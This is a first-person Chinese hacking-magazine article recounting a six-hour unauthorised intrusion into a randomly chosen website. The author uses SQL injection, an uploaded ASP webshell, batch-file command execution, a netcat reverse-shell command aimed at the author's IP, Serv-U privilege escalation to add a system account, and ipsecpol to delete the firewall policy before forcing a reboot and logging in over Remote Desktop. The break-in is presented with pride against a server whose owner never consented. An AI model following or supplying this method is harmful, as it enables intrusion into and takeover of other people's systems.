一次艰苦的6个小时的渗透过程

注意:本文已发表在《黑客X档案》2005年第二期上。转载请注明出处

这些天总觉得闷的慌,想到自己很久很久没有在实战中练习渗透了。于是到网上随便找了一个站点,深吸一口气:渗透开始了。
一边拿着SUPERSCAN扫描端口,一边在站点上转转,发现几个SQL注入的漏洞 ,是MSSQL的数据库却是都无法成功,大概是ASP的写法和我所使用的注入语句不一样吧,于是我把NBSI2祭了出来,左右扫了一下,发现几个没有发现的注入点,猜解之后不出我所料的是DB_OWNER用户,没什么权限,接着猜解,发现一个MANAGE_USER的表,得到了几个管理员用户.然后随手在网址后面加个Admin,居然跳出了后台管理.于是写上破解的用户名和密码就登入成功了.一切看起来都是那么顺利和自然.这时候SuperScan的扫描结果出来了,只开了个80端口.估计是做了TCP/IP筛选。这个好解决,呵呵。
在后台转转,一眼就看到了一个上传文件的页面,试一下上传一个ASP程序吧.等了几秒种,居然提示成功了!一会儿时间楞是没晃过神儿来。
这个时候我心里琢磨着这站点太容易进了吧,再渗透下去大概就没什么意思了,索性放弃去找另外的机器练手.但是当我浏览一下这个站点的C盘的时候发现管理员居然做了权限设置,(图1).嘿嘿~我心里想着这站点好玩,有点想拿下他的意思.
在ASP木马里浏览了一下,发现这台主机的设置还是比较变态的:C盘D盘E盘都没有办法浏览,F盘是存放网页的地方,设置的权限看起来像EVERYONE,再仔细看了一下,管理员禁止了WSH,看来执行文件应该有点麻烦了。不过起码还有一点让我感到庆幸的就是有FSO和一个盘可以用用,自我感觉还是蛮不错的。
现在有了WEBSHELL,我就开始提升权限,本来打算是想用海阳2005的搜索功能在F盘下面搜索SQL的用户和密码的,可是找到了几个站点的Conn.asp文件,发现原来SQL并不连接在本机上,而是远程主机,再说都不是SYSADMIN的用户,拿到了也没什么用处。哎,这么拽,想提升权限都麻烦啊。再试了试SHELL.APPLICATION, 发现程序是能够执行的,可是不能加参数也不能回显结果,似乎就没有什么用了.后来才明白这么一个弱知的想法害我走了不少弯路.
渗透到这里我感觉有点麻烦了,于是到QQ上叫了lcx和他讨论解决办法,Lcx简单的了解到了主机的设置以后,很简单的说了告诉我写个批处理就能执行带参数的命令了,至于结果,用定向符输出到F:\下的文件里去就可以了.看到这里,我一拍脑门:绝啊,我怎么没想到呢?
首先用海阳2005ASP木马在F:\下建立一个BAT文件.想想再怎么也起码要看一下系统的用户吧.于是写上NET USER >> F:\A.TXT
然后用SHELL.APPLICATION执行一下,再回到FSO页面刷新一下,诶?怎么没有生成A.TXT?大概是管理员设置了USERS的帐户不能访问CMD.EXE吧.于是我从自己的机器上上传了一个CMD.EXE到F:\下面然后写上f:\cmd.exe /c net user >>f:\a.txt.执行以后果然在F:\盘下多了一个A.TXT,看来我的猜想没有错.看一下,管理员用策略组把用户改的BT级了,没办法,再看下开了什么端口,发现主机除了开了80端口以外还开了21和3389,令人瞠目的是这个21端口上面居然还有人连接?不会吧?我怎么什么都没扫到?于是试着登入FTP,结果拒绝连接。怪了。
正面不行我干脆反着来,就算你做了TCP/IP筛选你也是对本机做的,对外连接你不行吧。恩,传了个NC上去,然后修改那个BAT文件:f:\nc.exe myip 1986 -e f:\cmd.exe,执行了以后我就做在电脑前等这个反向连接过来的SHELL,可是等了半天NC的监听端口上什么反映都没有。靠!难道是传说中的硬件_blank”> 防火墙?
这下似乎没辙了。无奈之下看了看端口列表,发现127.0.0.1这个端口对应着43958端口(图2)。恩?这个不是SERV-U的本地管理端口吗?刚好手上有个SERVU的权限提升 工具,一样传上去简单的执行一句添加NT用户的命令,再看一下,果然添加成功。不错。那么现在我来看看那几个被设置权限的盘吧。经过几次的执行,结果再次摧毁了我的意志,管理员把SYSTEM用户也给禁止了,试了试CACLS,照样不行。真郁闷。现在权限是有了,但是没有端口。没有其他什么东西可以给我控制,真是欲哭无泪。
这个时候LCX给我了提示说可以用VIDC反连过来或者是HACKER’S DOOR这样的后门.折腾了半天终于把东西传上去执行了,可是根本成功,VIDC连不了,HACKER’S DOOR更是没办法成功.好家伙,真是个难搞的种子啊,玩了两年半安全第一次碰到这么BT的主机。真的有点想放弃了。一看时间,过去4个多小时,除了权限能提升一点以外其他的都毫无进展,还是仔细的看一下这个F盘上还有什么好东西吧。
带着点绝望的色彩,我翻开一个又一个的目录,可是就是这样百无聊赖的寻找,还真给我找到一个好东西。主机上竟然有个“农贸服务器安全配置.ipsec”。这个IPSEC文件是什么,难道是IP安全策略文件?这台主机不会是用的IP策略吧。想想也是蛮有可能的,匆忙将这个文件下载到本地,在MMC.EXE添加一个管理单元,再添加一个IP安全策略,把这个文件导入:哈!果然不出我所了,一个叫“公司”的安全策略出现了(图3),接着一层层的打开他,发现做的真是BT,让我大饱了眼福啊,从SYN到ICMP都做了过滤了。学了不少东西。呵呵
研究了一下这个文件,我就开始猜想是不是对方的主机上也指派着这样一个安全策略呢?把他删除了,那么这台主机对着我就是在网络上裸奔了。呵呵。赶紧在本机上安装了一个Windows 200 Resource Kit,然后把其中的IPSECPOL.EXE、IPSECUTIL.DLL 、TEXT2POL.DLL提取出来传到这台主机上。这3个文件是在命令行下操作IPSEC的工具,我们只用它来删除这个安全指派。再编辑一次BAT文件用SERV-U的权限提升工具执行这条命令: ipsecpol -w REG -p “公司” -o ,如果不出以外的话这个名为“公司”的安全策略已经被删除掉了。那么现在唯一要做的工作就是重新启动系统,然后从终端服务登入上去。哈!越想越开心,最后编辑一次那个BAT文件,用IISRESET /REBOOT命令,然后执行。过了不多久网页就没办法访问了,看来是重启了。兴奋 ing。
经过短暂而又漫长的等待之后,在键盘的F5键的不断触动下,IE慢吞吞的返回了站点的首页,这个时候我再用终端连接上去,哇哈~成功了(图4),我差点就从椅子上蹦起来。使用刚才添加的帐户登入,看了看主机的大致情况,发现除了F 盘,其余的盘都设置只能由Administrator这个用户访问。真BT啊,这次渗透的确让我了解了不少东西,比如这个IPSEC设置,虽然是BT中的 BT,但是管理员唯一的错误就是把这个文件给备份到了一个拥有Everyone权限的盘上,呵呵。不知道是粗心还是什么,的确是他的失策啊。6个小时的入侵就这么结束了,想想起来真是回味无穷,至于以后的事情,估计我在这么BT的管理员手下活不了多长时间,还是就此撒手比较合得来,呵呵。